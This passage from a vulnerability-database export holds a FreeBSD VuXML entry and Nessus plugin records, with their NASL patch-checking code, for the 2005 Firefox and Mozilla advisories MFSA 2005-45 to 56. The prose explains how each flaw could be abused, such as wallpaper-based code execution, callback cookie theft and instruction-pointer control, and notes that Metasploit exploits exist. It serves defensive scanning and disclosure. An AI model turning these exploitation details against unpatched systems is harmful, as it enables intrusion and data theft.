"CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "description": "\nThe Mozilla Foundation reports of multiple security\n\t vulnerabilities in Firefox and Mozilla:\n\n\nMFSA 2005-56 Code execution through shared function\n\t objects\nMFSA 2005-55 XHTML node spoofing\nMFSA 2005-54 Javascript prompt origin spoofing\nMFSA 2005-53 Standalone applications can run arbitrary\n\t code through the browser\nMFSA 2005-52 Same origin violation: frame calling\n\t top.focus()\nMFSA 2005-51 The return of frame-injection\n\t spoofing\nMFSA 2005-50 Possibly exploitable crash in\n\t InstallVersion.compareTo()\nMFSA 2005-49 Script injection from Firefox sidebar\n\t panel using data:\nMFSA 2005-48 Same-origin violation with InstallTrigger\n\t callback\nMFSA 2005-47 Code execution via \"Set as\n\t Wallpaper\"\nMFSA 2005-46 XBL scripts ran even when Javascript\n\t disabled\nMFSA 2005-45 Content-generated event\n\t vulnerabilities\n\n\n", "edition": 4, "modified": "2005-07-12T00:00:00", "published": "2005-07-12T00:00:00", "id": "5D72701A-F601-11D9-BCD1-02061B08FC24", "href": "https://vuxml.freebsd.org/freebsd/5d72701a-f601-11d9-bcd1-02061b08fc24.html", "title": "firefox & mozilla -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2017-10-29T13:42:19", "description": "A number of vulnerabilities were reported and fixed in Firefox 1.0.5 and Mozilla 1.7.9. The following vulnerabilities have been backported and patched for this update:\n\nIn several places the browser UI did not correctly distinguish between true user events, such as mouse clicks or keystrokes, and synthetic events genenerated by web content. The problems ranged from minor annoyances like switching tabs or entering full-screen mode, to a variant on MFSA 2005-34 Synthetic events are now prevented from reaching the browser UI entirely rather than depend on each potentially spoofed function to protect itself from untrusted events (MFSA 2005-45; CVE-2005-2260).\n\nScripts in XBL controls from web content continued to be run even when Javascript was disabled. By itself this causes no harm, but it could be combined with most script-based exploits to attack people running vulnerable versions who thought disabling javascript would protect them. In the Thunderbird and Mozilla Suite mail clients Javascript is disabled by default for protection against denial-of-service attacks and worms; this vulnerability could be used to bypass that protection (MFSA 2005-46; CVE-2005-2261).\n\nIf an attacker can convince a victim to use the 'Set As Wallpaper' context menu item on a specially crafted image then they can run arbitary code on the user's computer. The image 'source' must be a javascript: url containing an eval() statement and such an image would get the 'broken image' icon, but with CSS it could be made transparent and placed on top of a real image. The attacker would have to convince the user to change their desktop background to the exploit image, and to do so by using the Firefox context menu rather than first saving the image locally and using the normal mechanism provided by their operating system. This affects only Firefox 1.0.3 and 1.0.4; earlier versions are unaffected. The implementation of this feature in the Mozilla Suite is also unaffected (MFSA 2005-47;\nCVE-2005-2262).\n\nThe InstallTrigger.install() method for launching an install accepts a callback function that will be called with the final success or error status. By forcing a page navigation immediately after calling the install method this callback function can end up running in the context of the new page selected by the attacker. This is true even if the user cancels the unwanted install dialog: cancel is an error status. This callback script can steal data from the new page such as cookies or passwords, or perform actions on the user's behalf such as make a purchase if the user is already logged into the target site.\nIn Firefox the default settings allow only http://addons.mozilla.org to bring up this install dialog. This could only be exploited if users have added questionable sites to the install whitelist, and if a malicious site can convince you to install from their site that's a much more powerful attack vector. In the Mozilla Suite the whitelist feature is turned off by default, any site can prompt the user to install software and exploit this vulnerability. The browser has been fixed to clear any pending callback function when switching to a new site (MFSA 2005-48; CVE-2005-2263).\n\nSites can use the _search target to open links in the Firefox sidebar. A missing security check allows the sidebar to inject data:\nurls containing scripts into any page open in the browser. This could be used to steal cookies, passwords or other sensitive data (MFSA 2005-49; CVE-2005-2264).\n\nWhen InstallVersion.compareTo() is passed an object rather than a string it assumed the object was another InstallVersion without verifying it. When passed a different kind of object the browser would generally crash with an access violation. shutdown has demonstrated that different javascript objects can be passed on some OS versions to get control over the instruction pointer. We assume this could be developed further to run arbitrary machine code if the attacker can get exploit code loaded at a predictable address (MFSA 2005-50; CVE-2005-2265).\n\nThe original frame-injection spoofing bug was fixed in the Mozilla Suite 1.7 and Firefox 0.9 releases. This protection was accidentally bypassed by one of the fixes in the Firefox 1.0.3 and Mozilla Suite 1.7.7 releases (MFSA 2005-51; CVE-2005-1937).\n\nA child frame can call top.focus() even if the framing page comes from a different origin and has overridden the focus() routine. The call is made in the context of the child frame. The attacker would look for a target site with a framed page that makes this call but doesn't verify that its parent comes from the same site. The attacker could steal cookies and passwords from the framed page, or take actions on behalf of a signed-in user. This attack would work only against sites that use frames in this manner (MFSA 2005-52;\nCVE-2005-2266).\n\nSeveral media players, for example Flash and QuickTime, support scripted content with the ability to open URLs in the default browser. The default behavior for Firefox was to replace the currently open browser window's content with the externally opened content. If the external URL was a javascript: url it would run as if it came from the site that served the previous content, which could be used to steal sensitive information such as login cookies or passwords. If the media player content first caused a privileged chrome: url to load then the subsequent javascript: url could execute arbitrary code. External javascript: urls will now run in a blank context regardless of what content it's replacing, and external apps will no longer be able to load privileged chrome: urls in a browser window. The -chrome command line option to load chrome applications is still supported (MFSA 2005-53; CVE-2005-2267).\n\nAlerts and prompts created by scripts in web pages are presented with the generic title [JavaScript Application] which sometimes makes it difficult to know which site created them. A malicious page could attempt to cause a prompt to appear in front of a trusted site in an attempt to extract information such as passwords from the user. In the fixed version these prompts will contain the hostname from the page which created it (MFSA 2005-54; CVE-2005-2268).\n\nParts of the browser UI relied too much on DOM node names without taking different namespaces into account and verifying that nodes really were of the expected type. An XHTML document could be used to create fake elements, for example, with content-defined properties that the browser would access as if they were the trusted built-in properties of the expected HTML elements. The severity of the vulnerability would depend on what the attacker could convince the victim to do, but could result in executing user-supplied script with elevated 'chrome' privileges. This could be used to install malicious software on the victim's machine (MFSA 2005-55; CVE-2005-2269).\n\nImproper cloning of base objects allowed web content scripts to walk up the prototype chain to get to a privileged object. This could be used to execute code with enhanced privileges (MFSA 2005-56;\nCVE-2005-2270).\n\nThe updated packages have been patched to address these issue.\n\nUpdate:\n\nNew packages are available that fix some regression errors that appeared in the Firefox 1.0.5 release that the patches were based on.", "edition": 2, "published": "2006-01-15T00:00:00", "type": "nessus", "title": "MDKSA-2005:120-1 : mozilla-firefox", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "cpe": ["cpe:/o:mandriva:linux"], "modified": "2012-09-07T00:00:00", "id": "MANDRAKE_MDKSA-2005-120.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=20420", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated as the associated update is not\n# for a supported release of Mandrake / Mandriva Linux.\n#\n# Disabled on 2012/09/06.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script was automatically generated from\n# Mandrake Linux Security Advisory MDKSA-2005:120-1.\n#\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20420);\n script_version (\"$Revision: 1.11 $\"); \n script_cvs_date(\"$Date: 2012/09/07 00:48:07 $\");\n\n script_cve_id(\"CVE-2005-1937\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n\n script_name(english:\"MDKSA-2005:120-1 : mozilla-firefox\");\n script_summary(english:\"Checks for patch(es) in 'rpm -qa' output\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Mandrake host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"A number of vulnerabilities were reported and fixed in Firefox 1.0.5\nand Mozilla 1.7.9. The following vulnerabilities have been backported\nand patched for this update:\n\nIn several places the browser UI did not correctly distinguish\nbetween true user events, such as mouse clicks or keystrokes, and\nsynthetic events genenerated by web content. The problems ranged from\nminor annoyances like switching tabs or entering full-screen mode, to\na variant on MFSA 2005-34 Synthetic events are now prevented from\nreaching the browser UI entirely rather than depend on each\npotentially spoofed function to protect itself from untrusted events\n(MFSA 2005-45; CVE-2005-2260).\n\nScripts in XBL controls from web content continued to be run even\nwhen Javascript was disabled. By itself this causes no harm, but it\ncould be combined with most script-based exploits to attack people\nrunning vulnerable versions who thought disabling javascript would\nprotect them. In the Thunderbird and Mozilla Suite mail clients\nJavascript is disabled by default for protection against\ndenial-of-service attacks and worms; this vulnerability could be used\nto bypass that protection (MFSA 2005-46; CVE-2005-2261).\n\nIf an attacker can convince a victim to use the 'Set As Wallpaper'\ncontext menu item on a specially crafted image then they can run\narbitary code on the user's computer. The image 'source' must be a\njavascript: url containing an eval() statement and such an image\nwould get the 'broken image' icon, but with CSS it could be made\ntransparent and placed on top of a real image. The attacker would\nhave to convince the user to change their desktop background to the\nexploit image, and to do so by using the Firefox context menu rather\nthan first saving the image locally and using the normal mechanism\nprovided by their operating system. This affects only Firefox 1.0.3\nand 1.0.4; earlier versions are unaffected. The implementation of\nthis feature in the Mozilla Suite is also unaffected (MFSA 2005-47;\nCVE-2005-2262).\n\nThe InstallTrigger.install() method for launching an install accepts\na callback function that will be called with the final success or\nerror status. By forcing a page navigation immediately after calling\nthe install method this callback function can end up running in the\ncontext of the new page selected by the attacker. This is true even\nif the user cancels the unwanted install dialog: cancel is an error\nstatus. This callback script can steal data from the new page such as\ncookies or passwords, or perform actions on the user's behalf such as\nmake a purchase if the user is already logged into the target site.\nIn Firefox the default settings allow only http://addons.mozilla.org\nto bring up this install dialog. This could only be exploited if\nusers have added questionable sites to the install whitelist, and if\na malicious site can convince you to install from their site that's a\nmuch more powerful attack vector. In the Mozilla Suite the whitelist\nfeature is turned off by default, any site can prompt the user to\ninstall software and exploit this vulnerability. The browser has been\nfixed to clear any pending callback function when switching to a new\nsite (MFSA 2005-48; CVE-2005-2263).\n\nSites can use the _search target to open links in the Firefox\nsidebar. A missing security check allows the sidebar to inject data:\nurls containing scripts into any page open in the browser. This could\nbe used to steal cookies, passwords or other sensitive data (MFSA\n2005-49; CVE-2005-2264).\n\nWhen InstallVersion.compareTo() is passed an object rather than a\nstring it assumed the object was another InstallVersion without\nverifying it. When passed a different kind of object the browser\nwould generally crash with an access violation. shutdown has\ndemonstrated that different javascript objects can be passed on some\nOS versions to get control over the instruction pointer. We assume\nthis could be developed further to run arbitrary machine code if the\nattacker can get exploit code loaded at a predictable address (MFSA\n2005-50; CVE-2005-2265).\n\nThe original frame-injection spoofing bug was fixed in the Mozilla\nSuite 1.7 and Firefox 0.9 releases. This protection was accidentally\nbypassed by one of the fixes in the Firefox 1.0.3 and Mozilla Suite\n1.7.7 releases (MFSA 2005-51; CVE-2005-1937).\n\nA child frame can call top.focus() even if the framing page comes\nfrom a different origin and has overridden the focus() routine. The\ncall is made in the context of the child frame. The attacker would\nlook for a target site with a framed page that makes this call but\ndoesn't verify that its parent comes from the same site. The attacker\ncould steal cookies and passwords from the framed page, or take\nactions on behalf of a signed-in user. This attack would work only\nagainst sites that use frames in this manner (MFSA 2005-52;\nCVE-2005-2266).\n\nSeveral media players, for example Flash and QuickTime, support\nscripted content with the ability to open URLs in the default\nbrowser. The default behavior for Firefox was to replace the\ncurrently open browser window's content with the externally opened\ncontent. If the external URL was a javascript: url it would run as if\nit came from the site that served the previous content, which could\nbe used to steal sensitive information such as login cookies or\npasswords. If the media player content first caused a privileged\nchrome: url to load then the subsequent javascript: url could execute\narbitrary code. External javascript: urls will now run in a blank\ncontext regardless of what content it's replacing, and external apps\nwill no longer be able to load privileged chrome: urls in a browser\nwindow. The -chrome command line option to load chrome applications\nis still supported (MFSA 2005-53; CVE-2005-2267).\n\nAlerts and prompts created by scripts in web pages are presented with\nthe generic title [JavaScript Application] which sometimes makes it\ndifficult to know which site created them. A malicious page could\nattempt to cause a prompt to appear in front of a trusted site in an\nattempt to extract information such as passwords from the user. In\nthe fixed version these prompts will contain the hostname from the\npage which created it (MFSA 2005-54; CVE-2005-2268).\n\nParts of the browser UI relied too much on DOM node names without\ntaking different namespaces into account and verifying that nodes\nreally were of the expected type. An XHTML document could be used to\ncreate fake elements, for example, with content-defined properties\nthat the browser would access as if they were the trusted built-in\nproperties of the expected HTML elements. The severity of the\nvulnerability would depend on what the attacker could convince the\nvictim to do, but could result in executing user-supplied script with\nelevated 'chrome' privileges. This could be used to install malicious\nsoftware on the victim's machine (MFSA 2005-55; CVE-2005-2269).\n\nImproper cloning of base objects allowed web content scripts to walk\nup the prototype chain to get to a privileged object. This could be\nused to execute code with enhanced privileges (MFSA 2005-56;\nCVE-2005-2270).\n\nThe updated packages have been patched to address these issue.\n\nUpdate:\n\nNew packages are available that fix some regression errors that\nappeared in the Firefox 1.0.5 release that the patches were based on.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.mandriva.com/security/advisories?name=MDKSA-2005:120-1\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/22\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/01/15\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Mandriva Local Security Checks\");\n \n script_copyright(english:\"This script is Copyright (C) 2006-2011 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated update is not currently for a supported release of Mandrake / Mandriva Linux.\");\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Mandrake/release\")) exit(0, \"The host is not running Mandrake Linux.\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) exit(1, \"Could not get the list of packages.\");\n\nflag = 0;\n\nif (rpm_check(reference:\"libnspr4-1.0.2-8.1.102mdk\", release:\"MDK10.2\", cpu:\"i386\", yank:\"mdk\")) flag++;\nif (rpm_check(reference:\"libnspr4-devel-1.0.2-8.1.102mdk\", release:\"MDK10.2\", cpu:\"i386\", yank:\"mdk\")) flag++;\nif (rpm_check(reference:\"libnss3-1.0.2-8.1.102mdk\", release:\"MDK10.2\", cpu:\"i386\", yank:\"mdk\")) flag++;\nif (rpm_check(reference:\"libnss3-devel-1.0.2-8.1.102mdk\", release:\"MDK10.2\", cpu:\"i386\", yank:\"mdk\")) flag++;\nif (rpm_check(reference:\"mozilla-firefox-1.0.2-8.1.102mdk\", release:\"MDK10.2\", cpu:\"i386\", yank:\"mdk\")) flag++;\nif (rpm_check(reference:\"mozilla-firefox-devel-1.0.2-8.1.102mdk\", release:\"MDK10.2\", cpu:\"i386\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse \n{\n if (rpm_exists(rpm:\"mozilla-firefox-\", release:\"MDK10.2\"))\n {\n set_kb_item(name:\"CVE-2005-1937\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2260\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2261\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2262\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2263\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2264\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2265\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2266\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2267\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2268\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2269\", value:TRUE);\n set_kb_item(name:\"CVE-2005-2270\", value:TRUE);\n }\n\n exit(0, \"The host is not affected.\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-07T10:44:27", "description": "The Mozilla Foundation reports of multiple security vulnerabilities in\nFirefox and Mozilla :\n\n- MFSA 2005-56 Code execution through shared function objects\n\n- MFSA 2005-55 XHTML node spoofing\n\n- MFSA 2005-54 JavaScript prompt origin spoofing\n\n- MFSA 2005-53 Standalone applications can run arbitrary code through\nthe browser\n\n- MFSA 2005-52 Same origin violation: frame calling top.focus()\n\n- MFSA 2005-51 The return of frame-injection spoofing\n\n- MFSA 2005-50 Possibly exploitable crash in\nInstallVersion.compareTo()\n\n- MFSA 2005-49 Script injection from Firefox sidebar panel using data\n:\n\n- MFSA 2005-48 Same-origin violation with InstallTrigger callback\n\n- MFSA 2005-47 Code execution via 'Set as Wallpaper'\n\n- MFSA 2005-46 XBL scripts ran even when JavaScript disabled\n\n- MFSA 2005-45 Content-generated event vulnerabilities", "edition": 29, "published": "2005-08-01T00:00:00", "title": "FreeBSD : firefox & mozilla -- multiple vulnerabilities (5d72701a-f601-11d9-bcd1-02061b08fc24)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2265", "CVE-2005-2267", "CVE-2005-2261", "CVE-2005-1937", "CVE-2005-2270", "CVE-2005-2264", "CVE-2005-2269", "CVE-2005-2263", "CVE-2005-2260", "CVE-2005-2262", "CVE-2005-2268", "CVE-2005-2266"], "modified": "2005-08-01T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-phoenix", "p-cpe:/a:freebsd:freebsd:mozilla-firebird", "p-cpe:/a:freebsd:freebsd:mozilla-thunderbird", "p-cpe:/a:freebsd:freebsd:fr-linux-netscape", "p-cpe:/a:freebsd:freebsd:linux-firefox", "p-cpe:/a:freebsd:freebsd:mozilla", "p-cpe:/a:freebsd:freebsd:mozilla-gtk2", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:mozilla-embedded", "p-cpe:/a:freebsd:freebsd:firefox", "p-cpe:/a:freebsd:freebsd:zhCN-linux-mozillafirebird", "p-cpe:/a:freebsd:freebsd:phoenix", "p-cpe:/a:freebsd:freebsd:de-linux-netscape", "p-cpe:/a:freebsd:freebsd:el-linux-mozillafirebird", "p-cpe:/a:freebsd:freebsd:pt_BR-netscape7", "p-cpe:/a:freebsd:freebsd:netscape7", "p-cpe:/a:freebsd:freebsd:de-netscape7", "p-cpe:/a:freebsd:freebsd:linux-mozilla", "p-cpe:/a:freebsd:freebsd:linux-mozillafirebird", "p-cpe:/a:freebsd:freebsd:zhTW-linux-mozillafirebird", "p-cpe:/a:freebsd:freebsd:linux-mozilla-devel", "p-cpe:/a:freebsd:freebsd:ru-linux-mozillafirebird", "p-cpe:/a:freebsd:freebsd:linux-netscape", "p-cpe:/a:freebsd:freebsd:fr-netscape7", "p-cpe:/a:freebsd:freebsd:de-linux-mozillafirebird", "p-cpe:/a:freebsd:freebsd:ja-linux-mozillafirebird-gtk1", "p-cpe:/a:freebsd:freebsd:ja-mozillafirebird-gtk2", "p-cpe:/a:freebsd:freebsd:ja-linux-netscape", "p-cpe:/a:freebsd:freebsd:mozilla-gtk1", "p-cpe:/a:freebsd:freebsd:mozilla+ipv6", "p-cpe:/a:freebsd:freebsd:ja-netscape7", "p-cpe:/a:freebsd:freebsd:mozilla-gtk"], "id": "FREEBSD_PKG_5D72701AF60111D9BCD102061B08FC24.NASL", "href": "https://www.tenable.com/plugins/nessus/19345", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19345);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-1937\", \"CVE-2005-2260\", \"CVE-2005-2261\", \"CVE-2005-2262\", \"CVE-2005-2263\", \"CVE-2005-2264\", \"CVE-2005-2265\", \"CVE-2005-2266\", \"CVE-2005-2267\", \"CVE-2005-2268\", \"CVE-2005-2269\", \"CVE-2005-2270\");\n\n script_name(english:\"FreeBSD : firefox & mozilla -- multiple vulnerabilities (5d72701a-f601-11d9-bcd1-02061b08fc24)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Mozilla Foundation reports of multiple security vulnerabilities in\nFirefox and Mozilla :\n\n- MFSA 2005-56 Code execution through shared function objects\n\n- MFSA 2005-55 XHTML node spoofing\n\n- MFSA 2005-54 JavaScript prompt origin spoofing\n\n- MFSA 2005-53 Standalone applications can run arbitrary code through\nthe browser\n\n- MFSA 2005-52 Same origin violation: frame calling top.focus()\n\n- MFSA 2005-51 The return of frame-injection spoofing\n\n- MFSA 2005-50 Possibly exploitable crash in\nInstallVersion.compareTo()\n\n- MFSA 2005-49 Script injection from Firefox sidebar panel using data\n:\n\n- MFSA 2005-48 Same-origin violation with InstallTrigger callback\n\n- MFSA 2005-47 Code execution via 'Set as Wallpaper'\n\n- MFSA 2005-46 XBL scripts ran even when JavaScript disabled\n\n- MFSA 2005-45 Content-generated event vulnerabilities\"\n );\n # http://www.mozilla.org/projects/security/known-vulnerabilities.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/known-vulnerabilities/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-45.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-45/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-46.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-46/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-47.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-47/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-48.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-48/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-49.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-49/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-50.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-50/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-51.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-51/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-52.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-52/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-53.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-53/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-54/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-55/\"\n );\n # http://www.mozilla.org/security/announce/mfsa2005-56.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2005-56/\"\n );\n # https://vuxml.freebsd.org/freebsd/5d72701a-f601-11d9-bcd1-02061b08fc24.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3bced778\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox compareTo() Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:de-linux-mozillafirebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:de-linux-netscape\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:de-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:el-linux-mozillafirebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:fr-linux-netscape\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:fr-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-linux-mozillafirebird-gtk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-linux-netscape\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-mozillafirebird-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozillafirebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-netscape\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-phoenix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla+ipv6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-gtk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", 